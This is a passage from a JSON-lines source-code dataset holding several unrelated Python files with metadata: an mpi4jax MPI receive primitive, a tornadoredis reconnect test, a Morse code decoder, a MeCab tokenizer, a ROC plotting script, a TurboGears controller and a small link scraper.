"matplotlib.pylab.get_cmap", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 28, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.collections.LineCollection", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.collections.LineCollection", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pylab.Normalize", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pylab.gca", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 56, "usage_type": "name"}, {"api_name": "pylab.show", "line_number": 57, "usage_type": "call"}, {"api_name": "landlab.RasterModelGrid", "line_number": 68, "usage_type": "call"}, {"api_name": "landlab.components.flow_accum.flow_accumulator.FlowAccumulator", "line_number": 72, "usage_type": "call"}, {"api_name": "landlab.plot.imshow.imshow_node_grid", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 87, "usage_type": "call"}, {"api_name": "landlab.components.flow_director.flow_direction_mfd.flow_directions_mfd", "line_number": 98, "usage_type": "call"}]}
+{"seq_id": "330175736", "text": "import numpy as _np\n\nfrom mpi4py import MPI as _MPI\n\nimport jax.numpy as jnp\nfrom jax import abstract_arrays, device_put\nfrom jax.lax import create_token\nfrom jax.core import Primitive\nfrom jax.lib import xla_client\nfrom jax.interpreters import xla\n\nfrom ..utils import (\n to_mpi_ptr,\n _unpack_builder,\n _ops,\n _constant_s32_scalar,\n _constant_u64_scalar,\n dtype_ptr,\n)\n\nfrom ..warn import warn_missing_omnistaging\n\n# The Jax primitive\nmpi_recv_p = Primitive(\"recv_mpi\") # Create the primitive\n\n\n# This function applies the primitive to an AST\ndef Recv(\n x,\n source=_MPI.ANY_SOURCE,\n tag=_MPI.ANY_TAG,\n comm=_MPI.COMM_WORLD,\n status=None,\n token=None,\n):\n \"\"\"\n Recv(x, source=_MPI.ANY_SOURCE, tag=_MPI.ANY_TAG, comm=_MPI.COMM_WORLD, status=None, token=None)\n\n Receives the input`x` from the target rank `source` using the communicator `comm`\n which defaults to the world comunicator, with the `tag`.\n An optional token can be passed, which is used to force jax to execute\n MPI operations in the correct order.\n This is particularly important if you are performing different Send/Recv\n operations, which might otherwise deadlock.\n\n Argumemnts:\n x: Array or scalar input with the desired shape and dtype.\n source: rank of the source MPI process.\n tag: Tag of this message.\n comm: The communicator (defaults to MPI.COMM_WORLD)\n status:\n token: token to force a sequential order in the operations (default=None)\n\n Returns:\n res: the received array or scalar\n new_token: a new, modified token, that depends on this operation.\n \"\"\"\n if token is None:\n token = create_token(x)\n\n out = mpi_recv_p.bind(x, token, source=source, tag=tag, comm=comm, status=status)\n return out\n\n\n# this function executes the primitive, when not under any transformation\ndef mpi_recv_impl(x, token, source, tag, comm, status):\n # TODO: make this support gpus (use cupy?)\n out = _np.empty_like(x)\n comm.Recv(out, source=source, tag=tag, status=status)\n\n res = jnp.array(out, dtype=out.dtype)\n\n # if it's a jax array and not a standard python array\n if hasattr(x, \"device_buffer\"):\n # put the result on the correct device if needed\n if not (res.device_buffer.device() == x.device_buffer.device()):\n res = device_put(res, device=x.device_buffer.device())\n\n return res, token\n\n\n# This function compiles the operation\ndef mpi_recv_xla_encode(c, x, token, source, tag, comm, status):\n from ..cython.mpi_xla_bridge import MPI_STATUS_IGNORE_ADDR\n\n warn_missing_omnistaging()\n\n c = _unpack_builder(c)\n x_shape = c.GetShape(x)\n dtype = x_shape.element_type()\n dims = x_shape.dimensions()\n\n # compute total number of elements in array\n _nitems = _constant_s32_scalar(c, _np.prod(dims, dtype=int))\n _dtype_ptr = dtype_ptr(dtype)\n\n sh = xla_client.Shape.tuple_shape(\n [\n xla_client.Shape.array_shape(dtype, dims),\n xla_client.Shape.token_shape(),\n ]\n )\n\n if status is None:\n _status = MPI_STATUS_IGNORE_ADDR\n else:\n _status = _MPI._addressof(status)\n\n operands = (\n _nitems,\n _constant_s32_scalar(c, source),\n _constant_s32_scalar(c, tag),\n _constant_u64_scalar(c, to_mpi_ptr(comm)),\n _constant_u64_scalar(c, _dtype_ptr),\n _constant_u64_scalar(c, _status),\n token,\n )\n\n out = _ops.CustomCall(\n c,\n b\"mpi_recv\",\n operands=operands,\n shape=sh,\n has_side_effect=True,\n )\n\n return out\n\n\n# This function evaluates only the shapes during AST construction\ndef mpi_recv_abstract_eval(xs, token, source, tag, comm, status):\n return (\n abstract_arrays.ShapedArray(xs.shape, xs.dtype),\n abstract_arrays.abstract_token,\n )\n\n\nmpi_recv_p.multiple_results = True\nmpi_recv_p.def_impl(mpi_recv_impl)\nmpi_recv_p.def_abstract_eval(mpi_recv_abstract_eval)\n\n# assign to the primitive the correct encoder\nxla.backend_specific_translations[\"cpu\"][mpi_recv_p] = mpi_recv_xla_encode\n", "sub_path": "mpi4jax/collective_ops/recv.py", "file_name": "recv.py", "file_ext": "py", "file_size_in_byte": 4117, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "jax.core.Primitive", "line_number": 24, "usage_type": "call"}, {"api_name": "mpi4py.MPI.ANY_SOURCE", "line_number": 30, "usage_type": "attribute"}, {"api_name": "mpi4py.MPI", "line_number": 30, "usage_type": "name"}, {"api_name": "mpi4py.MPI.ANY_TAG", "line_number": 31, "usage_type": "attribute"}, {"api_name": "mpi4py.MPI", "line_number": 31, "usage_type": "name"}, {"api_name": "mpi4py.MPI.COMM_WORLD", "line_number": 32, "usage_type": "attribute"}, {"api_name": "mpi4py.MPI", "line_number": 32, "usage_type": "name"}, {"api_name": "jax.lax.create_token", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.empty_like", "line_number": 68, "usage_type": "call"}, {"api_name": "jax.numpy.array", "line_number": 71, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 71, "usage_type": "name"}, {"api_name": "jax.device_put", "line_number": 77, "usage_type": "call"}, {"api_name": "warn.warn_missing_omnistaging", "line_number": 86, "usage_type": "call"}, {"api_name": "utils._unpack_builder", "line_number": 88, "usage_type": "call"}, {"api_name": "utils._constant_s32_scalar", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 94, "usage_type": "call"}, {"api_name": "utils.dtype_ptr", "line_number": 95, "usage_type": "call"}, {"api_name": "jax.lib.xla_client.Shape.tuple_shape", "line_number": 97, "usage_type": "call"}, {"api_name": "jax.lib.xla_client.Shape", "line_number": 97, "usage_type": "attribute"}, {"api_name": "jax.lib.xla_client", "line_number": 97, "usage_type": "name"}, {"api_name": "jax.lib.xla_client.Shape.array_shape", "line_number": 99, "usage_type": "call"}, {"api_name": "jax.lib.xla_client.Shape", "line_number": 99, "usage_type": "attribute"}, {"api_name": "jax.lib.xla_client", "line_number": 99, "usage_type": "name"}, {"api_name": "jax.lib.xla_client.Shape.token_shape", "line_number": 100, "usage_type": "call"}, {"api_name": "jax.lib.xla_client.Shape", "line_number": 100, "usage_type": "attribute"}, {"api_name": "jax.lib.xla_client", "line_number": 100, "usage_type": "name"}, {"api_name": "cython.mpi_xla_bridge.MPI_STATUS_IGNORE_ADDR", "line_number": 105, "usage_type": "name"}, {"api_name": "mpi4py.MPI._addressof", "line_number": 107, "usage_type": "call"}, {"api_name": "mpi4py.MPI", "line_number": 107, "usage_type": "name"}, {"api_name": "utils._constant_s32_scalar", "line_number": 111, "usage_type": "call"}, {"api_name": "utils._constant_s32_scalar", "line_number": 112, "usage_type": "call"}, {"api_name": "utils._constant_u64_scalar", "line_number": 113, "usage_type": "call"}, {"api_name": "utils.to_mpi_ptr", "line_number": 113, "usage_type": "call"}, {"api_name": "utils._constant_u64_scalar", "line_number": 114, "usage_type": "call"}, {"api_name": "utils._constant_u64_scalar", "line_number": 115, "usage_type": "call"}, {"api_name": "utils._ops.CustomCall", "line_number": 119, "usage_type": "call"}, {"api_name": "utils._ops", "line_number": 119, "usage_type": "name"}, {"api_name": "jax.abstract_arrays.ShapedArray", "line_number": 133, "usage_type": "call"}, {"api_name": "jax.abstract_arrays", "line_number": 133, "usage_type": "name"}, {"api_name": "jax.abstract_arrays.abstract_token", "line_number": 134, "usage_type": "attribute"}, {"api_name": "jax.abstract_arrays", "line_number": 134, "usage_type": "name"}, {"api_name": "jax.interpreters.xla.backend_specific_translations", "line_number": 143, "usage_type": "attribute"}, {"api_name": "jax.interpreters.xla", "line_number": 143, "usage_type": "name"}]}
+{"seq_id": "399641707", "text": "import socket\n\nfrom tornado import gen\nfrom tornado.netutil import TCPServer\n\nfrom tornado.testing import AsyncTestCase\n\nimport tornadoredis\nfrom tornadoredis.exceptions import ConnectionError\n\n\nclass DisconnectingRedisServer(TCPServer):\n @gen.engine\n def handle_stream(self, stream, address):\n n_args = yield gen.Task(stream.read_until, '\\r\\n')\n while n_args and n_args[0] == '*':\n yield gen.Task(stream.read_until, '\\r\\n')\n command = yield gen.Task(stream.read_until, '\\r\\n')\n arg_num = int(n_args.strip()[1:]) - 1\n if arg_num > 0:\n for __ in range(0, arg_num):\n # read the $N line\n yield gen.Task(stream.read_until, '\\r\\n')\n # read the argument line\n yield gen.Task(stream.read_until, '\\r\\n')\n stream.write('+OK\\r\\n')\n if command.strip() == 'DISCONNECT':\n try:\n stream.socket.shutdown(socket.SHUT_RDWR)\n stream.close()\n except socket.error:\n pass\n break\n n_args = yield gen.Task(stream.read_until, '\\r\\n')\n\n\n# RedisTestCase\nclass DisconnectTestCase(AsyncTestCase):\n test_db = 9\n test_port = 6380\n\n def setUp(self):\n #self._server_io_loop = IOLoop()\n # self._server_io_loop\n super(DisconnectTestCase, self).setUp()\n self._server = DisconnectingRedisServer(io_loop=self.io_loop)\n self._server.listen(self.test_port)\n self.client = self._new_client()\n self.client.flushdb()\n\n def _new_client(self):\n client = tornadoredis.Client(io_loop=self.io_loop, port=self.test_port)\n client.connection.connect()\n client.select(self.test_db)\n return client\n\n def tearDown(self):\n try:\n self.client.connection.disconnect()\n del self.client\n except AttributeError:\n pass\n self._server.stop()\n super(DisconnectTestCase, self).tearDown()\n\n def test_disconnect(self):\n def _disconnect_and_send_a_command():\n self.client.execute_command('DISCONNECT', callback=self.stop)\n self.wait()\n self.client.set('foo', 'bar', callback=self.stop)\n self.wait()\n self.assertRaises(ConnectionError, _disconnect_and_send_a_command)\n\n def test_bpop(self):\n def _disconnect_and_send_a_command():\n self.client.execute_command('DISCONNECT', callback=self.stop)\n self.wait()\n self.client.blpop('foo', callback=self.stop)\n self.wait()\n self.assertRaises(ConnectionError, _disconnect_and_send_a_command)\n\n\n#class ReconnectTestCase(RedisTestCase):\n# @async_test\n# @gen.engine\n# def test_redis_timeout(self):\n# res = yield gen.Task(self.client.setex, 'foo', 1, 'bar')\n# self.assertEqual(res, True)\n#\n# @gen.engine\n# def _get_delayed():\n# res = yield gen.Task(self.client.get, 'foo')\n# self.assertFalse(res)\n# self.stop()\n# self.delayed(2, _get_delayed)\n#\n# @async_test\n# @gen.engine\n# def test_redis_timeout_with_pipe(self):\n# res = yield gen.Task(self.client.set, 'foo', 'bar')\n# self.assertEqual(res, True)\n# pipe = self.client.pipeline(transactional=True)\n# pipe.get('foo')\n# res = yield gen.Task(pipe.execute)\n# self.assertEqual(res, ['bar'])\n# self.stop()\n", "sub_path": "tornadoredis/tests/reconnect.py", "file_name": "reconnect.py", "file_ext": "py", "file_size_in_byte": 3518, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tornado.netutil.TCPServer", "line_number": 12, "usage_type": "name"}, {"api_name": "tornado.gen.Task", "line_number": 15, "usage_type": "call"}, {"api_name": "tornado.gen", "line_number": 15, "usage_type": "name"}, {"api_name": "tornado.gen.Task", "line_number": 17, "usage_type": "call"}, {"api_name": "tornado.gen", "line_number": 17, "usage_type": "name"}, {"api_name": "tornado.gen.Task", "line_number": 18, "usage_type": "call"}, {"api_name": "tornado.gen", "line_number": 18, "usage_type": "name"}, {"api_name": "tornado.gen.Task", "line_number": 23, "usage_type": "call"}, {"api_name": "tornado.gen", "line_number": 23, "usage_type": "name"}, {"api_name": "tornado.gen.Task", "line_number": 25, "usage_type": "call"}, {"api_name": "tornado.gen", "line_number": 25, "usage_type": "name"}, {"api_name": "socket.SHUT_RDWR", "line_number": 29, "usage_type": "attribute"}, {"api_name": "socket.error", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tornado.gen.Task", "line_number": 34, "usage_type": "call"}, {"api_name": "tornado.gen", "line_number": 34, "usage_type": "name"}, {"api_name": "tornado.gen.engine", "line_number": 13, "usage_type": "attribute"}, {"api_name": "tornado.gen", "line_number": 13, "usage_type": "name"}, {"api_name": "tornado.testing.AsyncTestCase", "line_number": 38, "usage_type": "name"}, {"api_name": "tornadoredis.Client", "line_number": 52, "usage_type": "call"}, {"api_name": "tornadoredis.exceptions.ConnectionError", "line_number": 72, "usage_type": "argument"}, {"api_name": "tornadoredis.exceptions.ConnectionError", "line_number": 80, "usage_type": "argument"}]}
+{"seq_id": "209771507", "text": "#!/usr/local/bin/python2.7\n\nimport argparse\nimport logging\n\nfrom scripts import (add, edit_map, utils)\n\n\nFORMAT = \"[%(asctime)-15s][%(levelname)s] %(message)s\"\nlogging.basicConfig(format=FORMAT)\nlogging.getLogger().setLevel(logging.INFO)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('command', choices=['add', 'map', 'reset'])\n args, _ = parser.parse_known_args()\n if args.command == 'add':\n add.run(parser)\n if args.command == 'map':\n edit_map.run(parser)\n if args.command == 'reset':\n utils.upload(utils.create_url('reset'), None)\n", "sub_path": "Display/manage.py", "file_name": "manage.py", "file_ext": "py", "file_size_in_byte": 613, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.basicConfig", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 11, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 15, "usage_type": "call"}, {"api_name": "scripts.add.run", "line_number": 19, "usage_type": "call"}, {"api_name": "scripts.add", "line_number": 19, "usage_type": "name"}, {"api_name": "scripts.edit_map.run", "line_number": 21, "usage_type": "call"}, {"api_name": "scripts.edit_map", "line_number": 21, "usage_type": "name"}, {"api_name": "scripts.utils.upload", "line_number": 23, "usage_type": "call"}, {"api_name": "scripts.utils", "line_number": 23, "usage_type": "name"}, {"api_name": "scripts.utils.create_url", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "107933191", "text": "from loguru import logger\r\nimport cipheydists\r\n\r\n\r\nclass MorseCode:\r\n def __init__(self, lc):\r\n self.lc = lc\r\n self.ALLOWED = {\".\", \"-\", \" \", \"/\", \"\\n\"}\r\n self.MORSE_CODE_DICT = dict(cipheydists.get_charset(\"morse\"))\r\n self.MORSE_CODE_DICT_INV = {v: k for k, v in self.MORSE_CODE_DICT.items()}\r\n\r\n def decrypt(self, text):\r\n logger.debug(\"Attempting morse code\")\r\n if not self.checkIfMorse(text):\r\n return {\r\n \"lc\": self.lc,\r\n \"IsPlaintext?\": False,\r\n \"Plaintext\": None,\r\n \"Cipher\": \"Morse Code\",\r\n \"Extra Information\": None,\r\n }\r\n try:\r\n result = self.unmorse_it(text)\r\n except TypeError as e:\r\n return {\r\n \"lc\": self.lc,\r\n \"IsPlaintext?\": False,\r\n \"Plaintext\": None,\r\n \"Cipher\": \"Morse Code\",\r\n \"Extra Information\": None,\r\n }\r\n logger.debug(f\"Morse code successful, returning {result}\")\r\n return {\r\n \"lc\": self.lc,\r\n \"IsPlaintext?\": True,\r\n \"Plaintext\": result,\r\n \"Cipher\": \"Morse Code\",\r\n \"Extra Information\": None,\r\n }\r\n\r\n def checkIfMorse(self, text):\r\n count = 0\r\n for i in text:\r\n if i in self.ALLOWED:\r\n count += 1\r\n return count / len(text) > 0.625\r\n\r\n def unmorse_it(self, text):\r\n returnMsg = \"\"\r\n for word in text.split(\"/\"):\r\n for char in word.strip().split():\r\n # translates every letter\r\n try:\r\n m = self.MORSE_CODE_DICT_INV[char]\r\n except KeyError:\r\n m = \"\"\r\n returnMsg = returnMsg + m\r\n # after every word add a space\r\n # after every word add a space\r\n returnMsg = returnMsg + \" \"\r\n return returnMsg.strip().upper()\r\n", "sub_path": "ciphey/Decryptor/Encoding/morsecode.py", "file_name": "morsecode.py", "file_ext": "py", "file_size_in_byte": 1997, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "cipheydists.get_charset", "line_number": 9, "usage_type": "call"}, {"api_name": "loguru.logger.debug", "line_number": 13, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 13, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 32, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 32, "usage_type": "name"}]}
+{"seq_id": "154897630", "text": "#!/usr/bin/env python3\n\n\"\"\"分かち分け文書生成器\"\"\"\nimport os\nimport MeCab\nfrom iomanager import IOManager\nfrom file import File\n\n\nclass Wakachi(IOManager):\n \"\"\"分かち書きに関するクラス\"\"\"\n def __init__(self,\n input_path=\"./resource/file/\",\n output_path=\"./resource/wakachi/\"):\n super().__init__(input_path, output_path, \".txt\", \".wakachi\")\n self.hinshi_list = ['名詞', '形容詞', '動詞', '記号', '助詞', '助動詞', '接続詞', '副詞', '接頭詞']\n self.hinshi_kind = set()\n self.text = None\n self.results = []\n self.dict_word = {'名詞': [], '形容詞': [], '動詞': [], '記号': [], '助詞': [], '助動詞': [], '接続詞': [],\n '副詞': [], '接頭詞': []}\n self.stop_word = ['\\\\u', '。', '、', ',', '.', '0xe0', '「', '」', '(', ')', '=', \"-\", \"*\", '\"']\n self.stop_subtype = []\n\n def generate(self, is_force: bool=False):\n \"\"\"ディレクトリ内のテキストを全て分かち書きする\n @param is_force: trueなら上書き保存する\n \"\"\"\n for file in self.input.file_dict.values():\n write_path = self.output.path + file.name + self.output.default_extension\n if os.path.isfile(write_path) and is_force is False:\n continue\n self.generate_file(file, is_set_kind=True)\n\n def generate_file(self, file: File=None, is_set_kind: bool=False):\n \"\"\"あるテキストを分かち書きする\n @param file: 分かち書きするテキスト\n @param is_set_kind: trueなら品詞の種類を記録する\n \"\"\"\n if file is None:\n raise IndexError\n self.__open_text(file)\n self.__line_split(is_set_kind)\n self.__write(file)\n\n def __open_text(self, file: File):\n \"\"\"テキストを開く\n @param file: 分かち書きするテキスト\n \"\"\"\n with open(self.input.path + file.full_name, 'r', encoding=\"utf-8\") as file:\n binary_data = file.read()\n self.text = binary_data\n\n def token_split(self, tokens: object, is_set_kind=False)-> list:\n \"\"\"トークンを解析する\n @param tokens: MeCabで解析済の単語トークン\n @param is_set_kind: trueなら品詞の種類���記録する\n @return 単語のリスト\n \"\"\"\n r = []\n while tokens:\n w = tokens.surface\n ps = tokens.feature\n hinshi = ps.split(',')[0]\n self.hinshi_kind.add(hinshi)\n if hinshi in self.hinshi_list:\n if ps.split(',')[1] in self.stop_subtype:\n tokens = tokens.next\n continue\n r.append(w)\n if is_set_kind is True:\n self.dict_word[hinshi].append(w)\n tokens = tokens.next\n return r\n\n def __line_split(self, is_set_kind: bool=False):\n \"\"\"テキストを行ごとに分ける\n @param is_set_kind: trueなら品詞の種類を記録する\n \"\"\"\n def set_stop_word(_line):\n \"\"\"ストップワードの除去\"\"\"\n for _word in self.stop_word:\n _line = _line.replace(_word, ' ')\n return _line\n\n self.results = []\n t = MeCab.Tagger('-Ochasen')\n lines = self.text.split(\"\\n\")\n for line in lines:\n s = set_stop_word(line)\n t.parse(\"\")\n tokens = t.parseToNode(s)\n r = self.token_split(tokens, is_set_kind)\n rl = (\" \".join(r)).strip()\n self.results.append(rl)\n\n def __write(self, file: File):\n \"\"\"分かち書きした結果を書き込む\n @param file: 保存するファイル名\n \"\"\"\n wakachi_file = self.output.path + file.name + self.output.default_extension\n with open(wakachi_file, \"w\", encoding='utf-8-sig') as fp:\n fp.write(\"\\n\".join(self.results))\n\n\nclass WakachiMeishi(Wakachi):\n \"\"\"名詞のみの分かち書きに関するクラス\"\"\"\n def __init__(self,\n input_path=\"./resource/file/\",\n output_path=\"./resource/wakachi/\"\n ):\n super().__init__(input_path, output_path)\n self.output.default_extension = \".meishi.wakachi\"\n self.hinshi_list = ['名詞']\n self.stop_subtype = ['代名詞', '非自立', '数']\n self.stop_sub_subtype = []\n self.stop_word.extend(['_', '[', ']'])\n\n\ndef main():\n wakachi = WakachiMeishi()\n wakachi.generate()\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "app/spec2test/wakachi.py", "file_name": "wakachi.py", "file_ext": "py", "file_size_in_byte": 4664, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "iomanager.IOManager", "line_number": 10, "usage_type": "name"}, {"api_name": "file.name", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "file.File", "line_number": 35, "usage_type": "name"}, {"api_name": "file.File", "line_number": 46, "usage_type": "name"}, {"api_name": "file.full_name", "line_number": 50, "usage_type": "attribute"}, {"api_name": "file.read", "line_number": 51, "usage_type": "call"}, {"api_name": "MeCab.Tagger", "line_number": 87, "usage_type": "call"}, {"api_name": "file.File", "line_number": 97, "usage_type": "name"}, {"api_name": "file.name", "line_number": 101, "usage_type": "attribute"}]}
+{"seq_id": "494095631", "text": "# 2018.12.27: Receiver operating characteristic (ROC) curve\nimport sys\nimport numpy as np\n#import matplotlib\n#matplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n#=========================================================================================\n\nct_thres_list = [1.5,2.0,3.0,4.0]\nn = len(ct_thres_list)\n \nplt.figure(figsize=(3.0*n,3.2))\n\nfor i,ct_thres in enumerate(ct_thres_list):\n fptp = np.loadtxt('roc_av_40_100k_%s.dat'%(ct_thres)).astype(float)\n fp = fptp[:,0]\n tp = fptp[:,1]\n std = fptp[:,2]\n auc = tp.sum()/tp.shape[0]\n plt.subplot2grid((1,n),(0,i))\n plt.title('thres=%2.1f,auc=%5.4f'%(ct_thres,auc))\n #plt.errorbar(fp,tp,std)\n plt.plot(fp,tp,'b-')\n plt.fill_between(fp,tp-std,tp+std)\n plt.plot([0,1],[0,1],'k--')\n plt.xlim([0,1])\n plt.ylim([0,1])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n\nplt.tight_layout(h_pad=1, w_pad=1.5)\nplt.savefig('roc_av_40_100k.pdf', format='pdf', dpi=100)\n", "sub_path": "19.10.0911_protein_DCA_10_20k/4roc_av_plot.py", "file_name": "4roc_av_plot.py", "file_ext": "py", "file_size_in_byte": 980, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "numpy.loadtxt", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.fill_between", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}]}
+{"seq_id": "619244566", "text": "# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/engal/resourcecontroller.py\n# Compiled at: 2006-09-19 08:27:24\nfrom turbogears import controllers, expose\nimport cherrypy, logging\nlog = logging.getLogger('engal.resourcecontroller')\n\nclass Resource(controllers.Controller):\n __module__ = __name__\n item_getter = None\n friendly_resource_name = None\n exposed_resource = True\n\n @expose()\n def default(self, *vpath, **params):\n if not vpath:\n return self.index(**params)\n vpath = list(vpath)\n atom = vpath.pop(0)\n method = getattr(self, atom, None)\n if method and getattr(method, 'expose_container', False):\n return method(*vpath, **params)\n item = self.item_getter(atom)\n if item is None:\n raise cherrypy.NotFound\n self._addResource(item)\n if vpath:\n method = getattr(self, vpath[0], None)\n if method and getattr(method, 'exposed_resource'):\n return method(item, *vpath[1:], **params)\n return self.show(item, *vpath, **params)\n\n def _addResource(self, item):\n if not getattr(cherrypy.request, '_resourcecontroller', None):\n cherrypy.request._resourcecontroller = dict()\n cherrypy.request._resourcecontroller[self] = item\n if self.friendly_resource_name:\n cherrypy.request._resourcecontroller[friendly_resource_name] = item\n return\n\n def _getResource(self):\n return cherrypy.request._resourcecontroller.get(self, None)\n\n def _getResources(self):\n return cherrypy.request._resourcecontroller\n\n\ndef expose_resource(func):\n func.exposed = False\n func.exposed_resource = True\n return func", "sub_path": "pycfiles/engal-0.3.1-py2.4/resourcecontroller.py", "file_name": "resourcecontroller.py", "file_ext": "py", "file_size_in_byte": 1856, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "turbogears.controllers.Controller", "line_number": 11, "usage_type": "attribute"}, {"api_name": "turbogears.controllers", "line_number": 11, "usage_type": "name"}, {"api_name": "cherrypy.NotFound", "line_number": 28, "usage_type": "attribute"}, {"api_name": "turbogears.expose", "line_number": 17, "usage_type": "call"}, {"api_name": "cherrypy.request", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cherrypy.request", "line_number": 38, "usage_type": "attribute"}, {"api_name": "cherrypy.request", "line_number": 39, "usage_type": "attribute"}, {"api_name": "cherrypy.request", "line_number": 41, "usage_type": "attribute"}, {"api_name": "cherrypy.request._resourcecontroller.get", "line_number": 45, "usage_type": "call"}, {"api_name": "cherrypy.request", "line_number": 45, "usage_type": "attribute"}, {"api_name": "cherrypy.request", "line_number": 48, "usage_type": "attribute"}]}
+{"seq_id": "232175621", "text": "import requests\nfrom bs4 import BeautifulSoup\n\nwengine_search_target = 'a'\n\ndef wengine(url):\n source_code = requests.get(url)\n plain_sourcecode = source_code.text\n wengine_soup = BeautifulSoup(plain_sourcecode, \"html.parser\")\n result = wengine_soup.findAll(wengine_search_target)\n\n resultsFile = open('results.txt', 'w')\n\n for htmlbody in result:\n if \"http\" in str(htmlbody):\n resultsFile.write(htmlbody.get('href') + \"\\n\")\n\ndef settings():\n settingsFile = open('settings.txt', 'w')\n settingsFile.write(wengine_search_target)\n def readsettings():\n settingsFile.read()\n\n\n\t\t\nwhile True:\n\twengine(input(\"Insert webpage adress: \"))", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 680, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "requests.get", "line_number": 7, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 9, "usage_type": "call"}]}
